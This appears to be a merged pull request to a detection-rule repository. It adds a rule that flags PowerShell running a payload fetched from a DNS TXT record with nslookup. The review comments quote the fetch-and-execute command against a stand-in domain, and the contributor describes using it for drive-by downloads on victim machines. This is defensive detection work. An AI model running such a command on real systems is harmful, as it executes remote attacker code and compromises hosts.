### PR TITLE
Create  Abuse Nslookup with DNS Records

### PR DESCRIPTION
**Pull request by prashanthpulisetti**
Title: Abuse Nslookup with DNS Records

Description: Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.

### CODE REVIEW

File: rules/windows/powershell/powershell_classic/Abuse Nslookup with DNS Records [hunk 1]
```diff
@@ -0,0 +1,29 @@
...
+  category: ps_classic_start
+  definition: fields have to be extract from event
+detection:
+  selection:
+    HostApplication|contains: powershell.exe
+  filter:
+    HostApplication|startswith:
+    - nslookup.exe
+    - -q=txt
+  condition: selection and  filter
```
Comment (frack113) [inline rules/windows/powershell/powershell_classic/Abuse Nslookup with DNS Records:26]: We use 'filter' when we don't want something , here you are looking for it.
`"powershell . (nslookup -q=txt [http://some.owned.domain.com](https://t.co/Q1limQuu5A))[-1]"`
So get somethink like that
```yaml
    selection:
        HostApplication|contains|all: 
            - 'powershell.exe'
            - 'nslookup'
            - '-q=txt'
    condition: selection
```

Comment (prashanthpulisetti) [reply rules/windows/powershell/powershell_classic/Abuse Nslookup with DNS Records:26]: Hi @frack113 , thanks for the suggestion and that makes sense. 

let me make changes and update.

Comment (prashanthpulisetti) [reply rules/windows/powershell/powershell_classic/Abuse Nslookup with DNS Records]: Updated the yml file.

**Comment by frack113** [comment]
I try the command from ref and get
```xml
 Available 
   None 
   NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.19041.1682 HostId=664c80da-e6ad-42c4-93d9-0db17cb16403 HostApplication=powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] EngineVersion=5.1.19041.1682 RunspaceId=e075caa1-e307-414d-9c5d-ebcedd8514ff PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= 
```
Get no `powershell.exe` and no `nslookup.exe` in the log

**Comment by prashanthpulisetti** [comment]
Thank you for your message, @frack113. The URL in the reference is just for example, to perform actual request then we might need an unburned domain ( a newly created domain ) from where we can actually inject malicious commands in DNS records and then execute nslookup with ```powershell .(nslookup -q=txt <domain>)[-1]``` gonna execute with that malicious URL. 

For example, I have injected a DNS txt record with some malicious URL which has a drive-by-download attack pattern, and if I execute this command on a victim machine, the file will execute using the powershell period module (.)

**Comment by nasbench** [comment]
> Thank you for your message, @frack113. The URL in the reference is just for example, to perform actual request then we might need an unburned domain ( a newly created domain ) from where we can actually inject malicious commands in DNS records and then execute nslookup with `powershell .(nslookup -q=txt <domain>)[-1]` gonna execute with that malicious URL.
> 
> For example, I have injected a DNS txt record with some malicious URL which has a drive-by-download attack pattern, and if I execute this command on a victim machine, the file will execute using the powershell period module (.)

Hi and thanks for submitting this PR. I've made some changes to the rule to make it more generic with some cases.

As we know there multiple ways to launch Powershell and it'll get logged differently. (Somtimes with the `.exe` even). So I removed the `.exe` from both `PowerShell` and `nslookup` (see example below)

image

I've also added a related field since there is a rules covering this from a `process_creation` aspect.

Finally, I've updated the description and title to reflect more the technique.

**Review by nasbench — APPROVED** [review]

**Review by frack113 — APPROVED** [review]

**Comment by prashanthpulisetti** [comment]
Hi @frack113  and @nasbench; Thank you for your inputs and greatly appreciated.

**Comment by prashanthpulisetti** [comment]
Hi @frack113 / @nasbench , Out of the box question, I don't see the rule got merged in the sigma repository yet. Do I need to do anything from my end?

**Comment by nasbench** [comment]
> Hi @frack113 / @nasbench , Out of the box question, I don't see the rule got merged in the sigma repository yet. Do I need to do anything from my end?

Nothing to do. Will merge it later today.

**Pull request merged**